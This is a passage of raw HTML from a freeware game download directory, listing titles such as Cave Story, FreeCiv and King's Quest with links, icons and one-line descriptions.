href="http://www.download-free-games.com/freeware_games/captain_binary.htm"><img alt="Captain Binary" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/captain_binary_icon.gif" width="40" /></a></dd><dd>Earth has been attacked by aliens - Time to save the day! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/cave_story.htm">Cave Story</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/cave_story.htm"><img alt="Cave Story: Doukutsu Monogatari" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/cave_story_icon.gif" width="40" /></a></dd><dd>Great little side scrolling adventure, a must try. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/cholo.htm">Cholo</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/cholo.htm"><img alt="Cholo" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/cholo_icon.gif" width="40" /></a></dd><dd>Master the droids and free your people! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/command_conquer.htm">Command & Conquer</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/command_conquer.htm"><img alt="Command and Conquer Gold" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/command_conquer_icon.gif" width="40" /></a></dd><dd>Command and Conquer - the RTS classic now a free download! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/cottage_of_doom.htm">Cottage of Doom</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/cottage_of_doom.htm"><img alt="Cottage of Doom" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/cottage_of_doom_icon.gif" width="40" /></a></dd><dd>Avoid those zombies and make it out alive </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/crush.htm">Crush</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/crush.htm"><img alt="Crush" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/crush_icon.gif" width="40" /></a></dd><dd>Destroy as much of the city as you can! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/dark_oberon.htm">Dark Oberon</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/dark_oberon.htm"><img alt="Dark Oberon" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/dark_oberon_icon.gif" width="40" /></a></dd><dd>A simple and fun strategy game with rapid gameplay </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/dink_smallwood.htm">Dink Smallwood</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/dink_smallwood.htm"><img alt="Dink Smallwood" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/dink_smallwood_icon.gif" width="40" /></a></dd><dd>Go from being a bumbling pig farmer to a bumbling adventurer! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/dogfight_bits.htm">Dogfight </a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/dogfight_bits.htm"><img alt="Dogfight - Battle in the Skies" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/dogfight_bits_icon.gif" width="40" /></a></dd><dd>A classic 2D action game for the sky! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/duck_doom_deluxe.htm">Duck Doom Deluxe</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/duck_doom_deluxe.htm"><img alt="Duck Doom Deluxe" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/duck_doom_deluxe_icon.gif" width="40" /></a></dd><dd>NES Duck Hunt meets DOOM in this whacky shooter! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/dx_ball.htm">Dx Ball</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/dx_ball.htm"><img alt="Dx Ball" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/dx_ball_icon.gif" width="40" /></a></dd><dd>Breakout lovers will enjoy this brick breaking clone. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/eternal_daughter.htm">Eternal Daughter</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/eternal_daughter.htm"><img alt="Eternal Daughter" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/eternal_daughter_icon.gif" width="40" /></a></dd><dd>Help Mia unlock the truth of her real identity. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/amazon_queen.htm">Flight of the Amazon</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/amazon_queen.htm"><img alt="Flight of the Amazon Queen" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/amazon_queen_icon.gif" width="40" /></a></dd><dd>Uncover a sinister plot in the Amazon. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/flight_gear.htm">FlightGear</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/flight_gear.htm"><img alt="FlightGear" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/flight_gear_icon.gif" width="40" /></a></dd><dd>Take to the skies with this high-quality freeware FS. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/food_force.htm">Food Force</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/food_force.htm"><img alt="Food Force" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/food_force_icon.gif" width="40" /></a></dd><dd>Work with the UN to deliver food to hungry people. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/freeciv.htm">FreeCiv</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/freeciv.htm"><img alt="FreeCiv" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/freeciv_icon.gif" width="40" /></a></dd><dd>Build and lead a civilization to become the greatest of all time </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/frets_fire.htm">Frets on Fire</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/frets_fire.htm"><img alt="Frets on Fire" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/frets_fire_icon.gif" width="40" /></a></dd><dd>Fans of Guitar Hero will love this one! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/future_pinball.htm">Future Pinball</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/future_pinball.htm"><img alt="Future Pinball" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/future_pinball_icon.gif" width="40" /></a></dd><dd>The future of pinball is in your hands! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/gal_ex_sd.htm">Gal-EX - SD</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/gal_ex_sd.htm"><img alt="Gal-EX - Spatial Delivery" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/gal_ex_sd_icon.gif" width="40" /></a></dd><dd>Collect the packages and try to survive the intergalactic delivery! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/gate_88.htm">Gate 88</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/gate_88.htm"><img alt="Gate 88" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/gate_88_icon.gif" width="40" /></a></dd><dd>Build up your space army and take over the galaxy! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/generally.htm">GeneRally</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/generally.htm"><img alt="GeneRally" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/generally_icon.gif" width="40" /></a></dd><dd>Customize cars and race! Up to 6 players. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/gl_tron.htm">GL Tron</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/gl_tron.htm"><img alt="GL Tron" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/gl_tron_icon.gif" width="40" /></a></dd><dd>Light cycle racing based on the classic movie TRON! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/glest.htm">Glest</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/glest.htm"><img alt="Glest" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/glest_icon.gif" width="40" /></a></dd><dd>Build and conquer in this free real time strategy adventure! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/gunroar.htm">Gunroar</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/gunroar.htm"><img alt="Gunroar" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/gunroar_icon.gif" width="40" /></a></dd><dd>Steer a boat and sink the enemy fleet. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/happyland_adventures.htm">Happyland Adv.</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/happyland_adventures.htm"><img alt="Happyland Adventures" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/happyland_adventures_icon.gif" width="40" /></a></dd><dd>An exciting side-scrolling treasure hunt game! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/harmotion.htm">Harmotion</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/harmotion.htm"><img alt="Harmotion" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/harmotion_icon.gif" width="40" /></a></dd><dd>Fight your greatest foe - evil polygonal shapes! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/hasslevania.htm">Hasslevania</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/hasslevania.htm"><img alt="Hasslevania" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/hasslevania_icon.gif" width="40" /></a></dd><dd>If you liked Castlevania, there are plenty of laughs for you! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/heartland_deluxe.htm">Heartland Deluxe</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/heartland_deluxe.htm"><img alt="Heartland Deluxe" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/heartland_deluxe_icon.gif" width="40" /></a></dd><dd>Find the answers and solve the sinister mystery in Heartland </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/hidden_and_dangerous.htm">Hidden & Dangerous</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/hidden_and_dangerous.htm"><img alt="Hidden and Dangerous" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/hidden_and_dangerous_icon.gif" width="40" /></a></dd><dd>Take your SAS squadron into enemy lines! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/highway_pursuit.htm">Highway Pursuit</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/highway_pursuit.htm"><img alt="Highway Pursuit" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/highway_pursuit_icon.gif" width="40" /></a></dd><dd>Like Spy Hunter, drive fast & shoot well! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/icy_tower.htm">Icy Tower</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/icy_tower.htm"><img alt="Icy Tower" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/icy_tower_icon.gif" width="40" /></a></dd><dd>Jump higher up the tower without letting Harold the Homeboy slip </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/kings_quest1.htm">Kings Quest 1</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/kings_quest1.htm"><img alt="King’s Quest 1" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/kings_quest1_icon.gif" width="40" /></a></dd><dd>Help Sir Graham find the 3 magic items to restore the land! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/kings_quest2.htm">King's Quest 2</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/kings_quest2.htm"><img alt="King’s Quest 2: Romancing the Throne" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/kings_quest2_icon.gif" width="40" /></a></dd><dd>Rescue the damsel in danger in a strange land. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/kleptocracy.htm">Kleptocracy!</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/kleptocracy.htm"><img alt="Kleptocracy!" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/kleptocracy_icon.gif" width="40" /></a></dd><dd>Quick hands and light feet will get you far in Kleptocracy! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/knytt_stories.htm">Knytt Stories</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/knytt_stories.htm"><img alt="Knytt Stories" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/knytt_stories_icon.gif" width="40" /></a></dd><dd>Get ready to enter the fantastic and moody world of Knytt </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/liero_extreme.htm">Liero Extreme</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/liero_extreme.htm"><img alt="Liero Extreme" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/liero_extreme_icon.gif" width="40" /></a></dd><dd>Real time battles with worms and crazy weapons! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/lincity.htm">LinCity</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/lincity.htm"><img alt="LinCity" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/lincity_icon.gif" width="40" /></a></dd><dd>Build your own city and manage it in every way! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/little_fighter_II.htm">Little Fighter II</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/little_fighter_II.htm"><img alt="Little Fighter II" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/little_fighter_ii_icon.gif" width="40" /></a></dd><dd>Punch and kick your way to victory! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/madhouse.htm">Madhouse</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/madhouse.htm"><img alt="Madhouse" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/madhouse_icon.gif" width="40" /></a></dd><dd>Gauntlet like, monster shooter with some crazy levels! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/mage_bane2.htm">Mage Bane 2</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/mage_bane2.htm"><img alt="Mage Bane 2" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/mage_bane2_icon.gif" width="40" /></a></dd><dd>Lead your monks to recover an amulet. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/maniac_mansion_deluxe.htm">Maniac Mansion</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/maniac_mansion_deluxe.htm"><img alt="Maniac Mansion Deluxe" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/maniac_mansion_deluxe_icon.gif" width="40" /></a></dd><dd>A fun and free tribute to one of the best adventure games ever! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/war_game_download/metal_knights.htm">Metal Knights</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/war_game_download/metal_knights.htm"><img alt="Metal Knights" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/metal_knights_icon.gif" width="40" /></a></dd><dd>Turn based military strategy game. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/mucade.htm">Mu-cade</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/mucade.htm"><img alt="Mu-cade" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/mucade_icon.gif" width="40" /></a></dd><dd>Smashup waggly shmup, 'Mu-cade' </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/multihero.htm">MultiHero</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/multihero.htm"><img alt="MultiHero" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/multihero_icon.gif" width="40" /></a></dd><dd>A side-scrolling mash-up in the vein of Super Smash Brothers! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/nanozoa.htm">Nanozoa</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/nanozoa.htm"><img alt="Nanozoa" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/nanozoa_icon.gif" width="40" /></a></dd><dd>Fight human infections, as a Nano Warrior! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/net_hack.htm">Net Hack</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/net_hack.htm"><img alt="Net Hack" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/net_hack_icon.gif" width="40" /></a></dd><dd>Create a hero and explore dungeons. </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/ninja_loves_pirate.htm">Ninja Loves Pirate</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/ninja_loves_pirate.htm"><img alt="Ninja Loves Pirate" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/ninja_loves_pirate_icon.gif" width="40" /></a></dd><dd>Zombies, robots and mean end bosses! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/no_action_jackson.htm">No-Action Jackson</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/no_action_jackson.htm"><img alt="No-Action Jackson" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/no_action_jackson_icon.gif" width="40" /></a></dd><dd>Help geeky Jackson get to his D&D game! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/operation_spacehog.htm">Operation Spacehog</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/operation_spacehog.htm"><img alt="Operation Spacehog" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/operation_spacehog_icon.gif" width="40" /></a></dd><dd>Classic space shooter with a bit of humor. </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/orbiter.htm">Orbiter</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/orbiter.htm"><img alt="Orbiter" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/orbiter_icon.gif" width="40" /></a></dd><dd>Fly a variety of spacecraft in this realistic sim! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/out_of_order.htm">Out of Order</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/out_of_order.htm"><img alt="Out of Order" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/out_of_order_icon.gif" width="40" /></a></dd><dd>A humorous adventure in the tradition of Maniac Mansion! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/pacman.htm">Pac Man</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/pacman.htm"><img alt="Pac Man" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/pacman_icon.gif" width="40" /></a></dd><dd>A nearly exact replica of the arcade classic! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/paroxysm.htm">PAROXYSM</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/paroxysm.htm"><img alt="PAROXYSM" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/paroxysm_icon.gif" width="40" /></a></dd><dd>Avoid fiendish traps and make it out of the dungeon alive! </dd></dl> </td> </tr><tr> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/pekka_the_rooster_II.htm">Pekka the Rooster 2</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a href="http://www.download-free-games.com/freeware_games/pekka_the_rooster_II.htm"><img alt="Pekka the Rooster II" class="image-link" height="40" src="http://cdn.dfgfile.com/imgs/prod/icons/pekka_the_rooster_ii_icon.gif" width="40" /></a></dd><dd>Save the chickens from the evil crow that stole them! </dd></dl> </td> <td width="225"> <dl class="list-icon-small"><dt> <a href="http://www.download-free-games.com/freeware_games/prism_guard_shield.htm">Prism: Guard Shield</a> <img align="absmiddle" alt="Freeware Game" height="14" src="http://cdn.dfgfile.com/imgs/prod/ui/freeware_icon.gif" width="14" /> </dt><dd class="img"><a 